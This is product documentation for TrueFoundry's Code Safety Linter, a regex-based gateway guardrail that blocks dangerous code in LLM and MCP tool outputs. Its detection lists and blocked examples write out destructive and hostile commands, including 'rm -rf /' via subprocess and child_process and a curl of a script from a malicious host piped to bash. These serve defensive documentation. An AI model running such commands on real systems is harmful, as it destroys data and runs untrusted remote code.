Skip to main content
This guide explains how to use TrueFoundry’s built-in Code Safety Linter guardrail to detect and block potentially dangerous code patterns in LLM outputs.

What is Code Safety Linter?

Code Safety Linter is a built-in TrueFoundry guardrail that analyzes code in LLM responses to detect unsafe patterns that could pose security risks when executed. It runs directly within the AI Gateway without requiring external API calls.

Key Features

  1. Dangerous Function Detection: Identifies potentially dangerous code patterns including:
    • eval() and exec() calls that execute arbitrary code
    • os.system() and subprocess calls (Popen, call, run) for shell command execution
    • rm -rf and recursive delete commands
    • curl | bash and wget | bash remote code execution patterns
    • File system operations like unlink(), rmdir(), and shutil.rmtree()
  2. Multi-Language Support: Detects unsafe patterns across common programming languages:
    • Python: eval, exec, os.system, subprocess, shutil.rmtree, unlink, rmdir
    • JavaScript/Node.js: child_process.exec, child_process.spawn, require(‘child_process’)
    • Shell/Bash: rm -rf, rm -r, curl | bash, wget | sh
    • SQL: DROP TABLE, DELETE FROM, TRUNCATE TABLE
  3. Validation-Only Mode: Code Safety Linter operates in validation mode, detecting and blocking unsafe code rather than modifying it—ensuring code integrity while maintaining security.

Adding Code Safety Linter Guardrail

To add Code Safety Linter to your TrueFoundry setup, follow these steps:
1

Navigate to Guardrails

Go to the AI Gateway dashboard and navigate to the Guardrails section.
2

Create or Select a Guardrails Group

Create a new guardrails group or select an existing one where you want to add the Code Safety Linter guardrail.
3

Add Code Safety Linter Integration

Click on Add Guardrail and select Code Safety Linter from the TrueFoundry Guardrails section.
TrueFoundry guardrail selection interface showing Code Safety Linter option
4

Configure the Guardrail

Fill in the configuration form:
  • Name: Enter a unique name for this guardrail configuration (e.g., code-safety-linter)
  • Description: Optional description for this guardrail (default: “Detects unsafe code patterns in tool outputs (eval, exec, os.system, subprocess, rm -rf)”)
  • Operation: validate (Code Safety Linter only supports validation mode)
5

Save the Configuration

Click Save to add the guardrail to your group.

Configuration Options

ParameterDescriptionDefault
NameUnique identifierRequired
Operationvalidate only (does not modify code)validate
Enforcing Strategyenforce, enforce_but_ignore_on_error, or auditenforce
Code Safety Linter only supports validate mode—modifying code could break functionality. See Guardrails Overview for details on Enforcing Strategy.
Start with Audit mode to monitor detected patterns in Request Traces before switching to Enforce.

Detected Unsafe Patterns

The Code Safety Linter detects the following categories of unsafe code patterns. Each pattern is designed to identify potentially dangerous code constructs that could pose security risks.

Python Dangerous Functions

PatternDetectionRisk LevelDescription
eval()eval(CriticalExecutes arbitrary Python expressions from strings
exec()exec(CriticalExecutes arbitrary Python code from strings
os.system()os.system(HighExecutes shell commands directly
subprocess.Popen()subprocess.Popen(HighSpawns new processes with full control
subprocess.call()subprocess.call(HighSpawns new processes and waits for completion
subprocess.run()subprocess.run(HighRuns commands in subprocess (Python 3.5+)

Python File System Operations

PatternDetectionRisk LevelDescription
unlink()unlink(MediumDeletes files (os.unlink or pathlib)
rmdir()rmdir(MediumRemoves directories
shutil.rmtree()shutil.rmtree(HighRecursively deletes directory trees

Shell/Bash Dangerous Commands

PatternDetectionRisk LevelDescription
rm -rfrm -rfCriticalRecursive force delete - can destroy entire filesystems
rm -rrm ... -rHighRecursive delete with any flags
curl | bashcurl ... | bash or curl ... | shCriticalPiping remote scripts directly to shell execution
wget | bashwget ... | bash or wget ... | shCriticalPiping downloaded content directly to shell execution

JavaScript/Node.js Dangerous Functions

PatternDetectionRisk LevelDescription
child_process.exec()child_process.exec(HighExecutes shell commands with full shell syntax
child_process.spawn()child_process.spawn(HighSpawns new processes
require('child_process')require('child_process')MediumImporting the child_process module (often precedes dangerous calls)

SQL Dangerous Statements

PatternDetectionRisk LevelDescription
DROP TABLEDROP TABLECriticalPermanently deletes database tables
DELETE FROMDELETE FROM table;HighDeletes rows from tables (flagged without WHERE clause context)
TRUNCATE TABLETRUNCATE TABLECriticalRemoves all data from tables instantly
For more comprehensive SQL protection, consider using the SQL Sanitizer guardrail which provides configurable options for SQL-specific patterns.

How It Works

The guardrail scans message content using regex-based detection:
  1. Extracts messages from request/response
  2. Scans against all blocked patterns
  3. Returns findings with pattern name and matched text (truncated to 20 chars)
  4. Returns verdict: true (pass) or false (block), limited to first 10 findings
{
  "error": null,
  "verdict": false,
  "data": {
    "findings": [
      { "pattern": "eval_call", "match": "eval(user_input)" },
      { "pattern": "subprocess_popen", "match": "subprocess.Popen([…" }
    ],
    "explanation": "Detected 2 unsafe code pattern(s): eval_call, subprocess_popen"
  },
  "transformedData": {
    "request": { "json": null },
    "response": { "json": null }
  },
  "transformed": false
}

Example - Blocked Responses

import subprocess
result = subprocess.Popen(['rm', '-rf', '/'], shell=True)
Result: Blocked - Detected subprocess.Popen() call
user_input = request.get('code')
eval(user_input)  # Executes arbitrary user code
Result: Blocked - Detected eval() call
# Clean up old files
rm -rf /var/log/*
Result: Blocked - Detected rm -rf command
curl https://malicious-site.com/script.sh | bash
Result: Blocked - Detected curl | bash pattern
const { exec } = require('child_process');
child_process.exec('rm -rf /', (error, stdout) => {});
Result: Blocked - Detected require('child_process') and child_process.exec() calls
DROP TABLE users;
Result: Blocked - Detected DROP TABLE statement

Example - Allowed Responses

with open('data.txt', 'r') as f:
    content = f.read()
    
# Using pathlib for safe file handling
from pathlib import Path
data = Path('config.json').read_text()
Result: Allowed - No unsafe patterns detected
const fs = require('fs').promises;
const data = await fs.readFile('config.json', 'utf8');
Result: Allowed - No unsafe patterns detected
SELECT * FROM users WHERE id = ?;
UPDATE users SET name = ? WHERE id = ?;
Result: Allowed - No unsafe patterns detected

Use Cases

Agent Tool Output Validation

When using AI agents that execute code via MCP tools, apply Code Safety Linter to validate tool outputs. Configure via guardrail rules:
name: guardrails-control
type: gateway-guardrails-config
rules:
  - id: code-executor-safety
    when:
      target:
        operator: or
        conditions:
          mcpServers:
            values:
              - code-executor
            condition: in
      subjects:
        operator: and
        conditions:
          in:
            - team:engineering
          not_in:
            - user:devops-admin@example.com
    llm_input_guardrails: []
    llm_output_guardrails: []
    mcp_tool_pre_invoke_guardrails: []
    mcp_tool_post_invoke_guardrails:
      - my-guardrail-group/code-safety-linter

Code Generation Applications

For LLM responses that generate code, validate via the X-TFY-GUARDRAILS header:
curl -X POST "https://{controlPlaneURL}/api/llm/chat/completions" \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -H 'X-TFY-GUARDRAILS: {"llm_input_guardrails":[],"llm_output_guardrails":["my-guardrail-group/code-safety-linter"]}' \
  -d '{
    "model": "openai-main/gpt-4o-mini",
    "messages": [
      {"role": "system", "content": "You are a helpful coding assistant."},
      {"role": "user", "content": "Generate code to clean up old log files"}
    ]
  }'
HookUse Case
LLM OutputValidate code in LLM responses
MCP Post ToolValidate code from MCP tools (code executors, file readers)
Regex-based detection: Patterns match exact syntax. Obfuscated code may not be detected. Use as part of defense-in-depth, not sole protection.